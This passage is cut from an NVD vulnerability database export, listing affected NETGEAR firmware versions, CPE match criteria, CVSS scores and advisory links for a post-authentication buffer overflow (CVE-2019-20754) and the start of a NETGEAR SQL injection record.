"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54EEBD4A-4734-4F43-B7D4-39D81C83A873",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "AB00ECAD-7474-4D85-8248-D014E5808814",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E338A30-C349-41B4-B971-E6D6B0E9AFE4",
"versionEndExcluding": "1.2.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects DGN2200 before 1.0.0.58, DGN2200B before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.80, D6220 before 1.0.0.44, EX7000 before 1.0.0.66, EX6200 before 1.0.3.88, EX6150 before 1.0.0.42, EX7500 before 1.0.0.46, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900P before 1.4.0.10, R8000P before 1.4.0.10, R7900 before 1.0.2.16, R7000P before 1.3.1.44, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.1.44, R7000 before 1.0.9.32, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.54."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer por parte de un usuario autenticado. Esto afecta a DGN2200 versiones anteriores a 1.0.0.58, DGN2200B versiones anteriores a 1.0.0.58, D8500 versiones anteriores a 1.0.3.42, D7000v2 versiones anteriores a 1.0.0.51, D6400 versiones anteriores a 1.0.0.80, D6220 versiones anteriores a 1.0.0.44, EX7000 versiones anteriores a 1.0.0. 66, EX6200 versiones anteriores a 1.0.3.88, EX6150 versiones anteriores a 1.0.0.42, EX7500 versiones anteriores a 1.0.0.46, JNDR3000 versiones anteriores a 1.0.0.24, R8000 versiones anteriores a 1.0.4.18, R8500 versiones anteriores a 1.0.2.122, R8300 versiones anteriores a 1.0.2.122, R7900P versiones anteriores a 1.4.0. 10, R8000P versiones anteriores a 1.4.0.10, R7900 versiones anteriores a 1.0.2.16, R7000P versiones anteriores a 1.3.1.44, R7300DST versiones anteriores a 1.0.0.68, R7100LG versiones anteriores a 1.0.0.46, R6900P versiones anteriores a 1.3.1.44, R7000 versiones anteriores a 1.0.9.32, R6900 versiones anteriores a 1. 0.1.46, R6700 versiones anteriores a 1.0.1.46, R6400v2 versiones anteriores a 1.0.2.56, R6400 versiones anteriores a 1.0.1.42, R6300v2 versiones anteriores a 1.0.4.28, R6250 versiones anteriores a 1.0.4.26, WNDR4500v2 versiones anteriores a 1.0.0.72, y WNR3500Lv2 versiones anteriores a 1.2.0.54."
}
],
"id": "CVE-2019-20754",
"lastModified": "2024-11-21T04:39:16.570",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T22:15:12.853",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060628/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Modem-Routers-and-Extenders-PSV-2018-0054"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060628/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Modem-Routers-and-Extenders-PSV-2018-0054"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 20:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by SQL injection. This affects D3600 before 1.0.0.68, D6000 before 1.0.0.68, D6200 before 1.1.00.28, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DC112A before 1.0.0.40, EX8000 before 1.0.0.118, JR6150 before 1.0.1.18, R6050 before 1.0.1.18, R6220 before 1.1.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6700v2 before 1.2.0.16, R6800 before 1.2.0.16, R6900v2 before 1.2.0.16, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500 before 1.0.0.118, R7500v2 before 1.0.3.26, R7800 before 1.0.2.40, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.6, R9000 before 1.0.3.10, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.56, and WNDR4500v3 before 1.0.0.56.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D55132B3-B7CF-4BB9-B28B-406136D0C97B",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2B5E3F3F-237F-4ADD-8853-CEBE78AAAC36",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B305E585-0F19-41E0-A6D1-01BBB1AA6DA1",
"versionEndExcluding": "1.1.00.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8AA0851-BFD5-45F6-9673-CA4B83D8B844",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD763D04-70A0-4A50-8866-330B82703680",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB2B81-08D9-4C81-B6DE-8D1FCAEC485A",
"versionEndExcluding": "1.0.1.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "061389AF-C8DA-48DF-8D7E-014A9B8D5D09",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB24F17D-A9A8-4EF9-BF53-580395D60EFC",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dc112a_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D7587473-93CA-4998-9D73-0E936E425F23",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dc112a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F87FFC46-137D-45B8-B437-F15565FB33D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E176AD5-23F8-4AF8-9BF4-44E065954A57",
"versionEndExcluding": "1.0.0.118",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8D9781C9-799A-4BDA-A027-987627A01633",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC9C60BB-2E7F-4D35-9348-8D8AEFAAD75F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EDB0CD0A-A68D-4EF5-A938-6A15604C9107",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "426CB7BF-AE12-4C39-A9F3-86B91383779B",
"versionEndExcluding": "1.1.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "110B10A0-1969-4FDE-9289-6EAB81D1657B",
"versionEndExcluding": "1.0.4.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9597966A-B13C-4098-838B-EC9AA8DE443D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB86B739-440E-4269-92EC-F7F3058E4406",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B0BCDB34-EC1F-43A1-AA7D-BF4CA1F4C168",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D1E1F23B-5E81-4BBE-B161-EE9EA4783979",
"versionEndExcluding": "1.2.0.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "36871A5D-AC19-43AC-96AD-20F8FB5E2D47",
"versionEndExcluding": "1.2.0.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EC9FF3EB-EEBA-45C5-B6D6-98D9F0B5ECA2",
"versionEndExcluding": "1.2.0.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A71BAC6A-F08E-4015-9A54-3CF5FDF85950",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5352DD0A-3388-423C-B6E3-38FFF8B4700F",
"versionEndExcluding": "1.0.9.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CB1E644-FB4B-443B-B9D7-349F0024FB74",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFFC911D-B2A3-47D7-940A-76978458CEA5",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB388895-B579-43B7-A88E-4BD28D41F6E2",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7494430D-BA3F-4EDB-9FB8-7586D4457B9D",
"versionEndExcluding": "1.0.0.118",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9ACBF492-1315-46CF-8297-E239DDB14B6B",
"versionEndExcluding": "1.0.3.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A2E62164-2324-4AF2-B300-8005DAD433B6",
"versionEndExcluding": "1.0.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7E4D2E75-1ADA-4ECE-B1B5-12E28913063E",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16C3369B-3E65-4CB7-BFF0-5052DBB16C45",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
